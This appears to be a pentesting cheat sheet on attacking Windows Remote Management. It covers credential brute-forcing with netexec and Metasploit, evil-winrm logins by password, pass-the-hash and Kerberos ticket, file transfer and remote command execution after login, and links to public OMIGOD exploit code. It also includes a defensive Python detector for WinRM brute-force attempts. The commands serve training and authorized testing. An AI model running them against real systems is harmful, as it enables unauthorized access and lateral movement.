# WinRM (Windows Remote Management) Pentesting

WinRM is the Microsoft implementation of the WS-Management protocol, which provides a common way for systems to access and exchange management information across an IT infrastructure. The default ports are 5985 (HTTP) and 5986 (HTTPS); port 47001 is also used by the WinRM listener.

### Enumeration <a href="#enumeration" id="enumeration"></a>

#### Brute Force Credentials <a href="#brute-force-credentials" id="brute-force-credentials"></a>

```
netexec winrm <target-ip> -d DOMAIN -u usernames.txt -p passwords.txt 

# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login
```
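As an added defender-side example (not part of the original page), the Python below flags the pattern the commands above generate on the target: many failed network logons against several accounts from a source that has connected to a WinRM port. The event records and field names are constructed and simplified; real Security 4625 and Sysmon event 3 records would first have to be parsed into this shape.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs): a subset of fields from Windows Security 4625
# (failed logon, LogonType 3 = network) and Sysmon event 3 (network connection), one dict each.
EVENTS = [
    {"ts": "2024-05-01T10:00:00", "id": 3, "src": "10.0.0.5", "dst_port": 5985},
    {"ts": "2024-05-01T10:00:01", "id": 4625, "src": "10.0.0.5", "user": "alice", "logon_type": 3},
    {"ts": "2024-05-01T10:00:02", "id": 4625, "src": "10.0.0.5", "user": "bob", "logon_type": 3},
    {"ts": "2024-05-01T10:00:03", "id": 4625, "src": "10.0.0.5", "user": "carol", "logon_type": 3},
    {"ts": "2024-05-01T10:00:04", "id": 4625, "src": "10.0.0.5", "user": "dave", "logon_type": 3},
    {"ts": "2024-05-01T10:00:05", "id": 4625, "src": "10.0.0.5", "user": "eve", "logon_type": 3},
    # A host that reached WinRM once and mistyped one password: benign.
    {"ts": "2024-05-01T10:01:00", "id": 3, "src": "10.0.0.7", "dst_port": 5986},
    {"ts": "2024-05-01T10:01:01", "id": 4625, "src": "10.0.0.7", "user": "frank", "logon_type": 3},
    # Repeated failures from a host that never touched a WinRM port: out of scope for this rule.
    {"ts": "2024-05-01T10:02:00", "id": 4625, "src": "10.0.0.9", "user": "svc", "logon_type": 3},
    {"ts": "2024-05-01T10:02:01", "id": 4625, "src": "10.0.0.9", "user": "svc", "logon_type": 3},
    {"ts": "2024-05-01T10:02:02", "id": 4625, "src": "10.0.0.9", "user": "svc", "logon_type": 3},
]

WINRM_PORTS = {5985, 5986, 47001}

def winrm_sources(events):
    """Source IPs that opened a connection to a WinRM listener port (Sysmon event 3)."""
    return {e["src"] for e in events if e["id"] == 3 and e.get("dst_port") in WINRM_PORTS}

def detect_winrm_bruteforce(events, window=timedelta(minutes=5), min_failures=5, min_users=3):
    """Return {src_ip: (failures, distinct_users)} for sources that talked to a WinRM port and
    produced >= min_failures network-logon failures against >= min_users accounts within window."""
    talkers = winrm_sources(events)
    failures = defaultdict(list)
    for e in events:
        if e["id"] == 4625 and e.get("logon_type") == 3 and e["src"] in talkers:
            failures[e["src"]].append((datetime.fromisoformat(e["ts"]), e["user"]))
    alerts = {}
    for src, items in failures.items():
        items.sort()
        start = 0
        for end in range(len(items)):            # sliding window over time-sorted failures
            while items[end][0] - items[start][0] > window:
                start += 1
            chunk = items[start:end + 1]
            users = {u for _, u in chunk}
            if len(chunk) >= min_failures and len(users) >= min_users:
                alerts[src] = (len(chunk), len(users))
                break                             # first qualifying window is enough
    return alerts
```

The user-count threshold separates a spray across accounts from a single user repeatedly mistyping a password; tune both thresholds to the environment's baseline.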

### Connect <a href="#connect" id="connect"></a>

[**Evil-WinRM**](https://github.com/Hackplayers/evil-winrm) is a Windows Remote Management shell for pentesting.\
Below is a list of commands for each situation.

#### Using Username/Password <a href="#using-usernamepassword" id="using-usernamepassword"></a>

```
evil-winrm -i <target-ip> -u username -p password
# -P: Specify port
evil-winrm -i <target-ip> -P 5986 -u username -p password

# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc

# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts

# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S
```

If you have a private key and a public key, you can use them for certificate-based authentication.

```
# -S: SSL
# -k: private key
# -c: public key
evil-winrm -i <target-ip> -S -k private.key -c public.key
```

#### Using Kerberos Authentication <a href="#using-kerberos-authentication" id="using-kerberos-authentication"></a>

If we have a Kerberos ticket for a user, we can log in with that ticket, but some settings are required.\
First, change the `nameserver` value in `/etc/resolv.conf` on our attack machine so that the domain's names resolve via the target:

```
nameserver <target-ip>
```

Then modify `/etc/krb5.conf` (or create it if it does not exist) on our attack machine as below:

```
[libdefaults]
    default_realm = EXAMPLE.LOCAL
    dns_lookup_realm = true
    dns_lookup_kdc = true

[realms]
    EXAMPLE.LOCAL = {
        kdc = dc.example.local
        admin_server = dc.example.local
        default_domain = example.local
    }

[domain_realm]
    example.local = EXAMPLE.LOCAL
    .example.local = EXAMPLE.LOCAL
```

Note that `example.local` and `dc.example.local` must be added to `/etc/hosts`.\
Now point the `KRB5CCNAME` environment variable at the ticket cache and log in with `evil-winrm`:

```
export KRB5CCNAME=<username>.ccache
evil-winrm -i dc.example.local -r example.local
```

### Commands <a href="#commands" id="commands"></a>

After connecting with `evil-winrm`, a number of useful built-in commands are available for post-exploitation.\
Note that **absolute paths must be specified when uploading and downloading.**

```
# Upload a local file to Windows machine
PS> upload ./example.bat C:\Users\Administrator\Desktop\exploit.bat
# Download a file to local
PS> download C:\Users\Administrator\Desktop\example.txt ./example.txt

# List all services
PS> services
```

### Command Execution with NetExec <a href="#command-execution-with-netexec" id="command-execution-with-netexec"></a>

```
# -x: Execute a command
netexec winrm <target-ip> -d DOMAIN -u username -p password -x 'whoami'
# -X: Execute a PowerShell command
netexec winrm <target-ip> -d DOMAIN -u username -p password -X '$PSVersionTable'

# -H: Login with Pass The Hash
netexec winrm <target-ip> -d DOMAIN -u username -H <HASH> -x 'whoami'
```

### OMIGOD (CVE-2021-38647) <a href="#omigod-cve-2021-38647" id="omigod-cve-2021-38647"></a>

Open Management Infrastructure (OMI), Microsoft's open-source WS-Management implementation for Linux, is vulnerable to unauthenticated Remote Code Execution (RCE) through its management listener.

Several public PoCs are available, for instance:

* <https://github.com/AlteredSecurity/CVE-2021-38647>
* <https://github.com/horizon3ai/CVE-2021-38647>

### References <a href="#references" id="references"></a>

* [Microsoft](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)
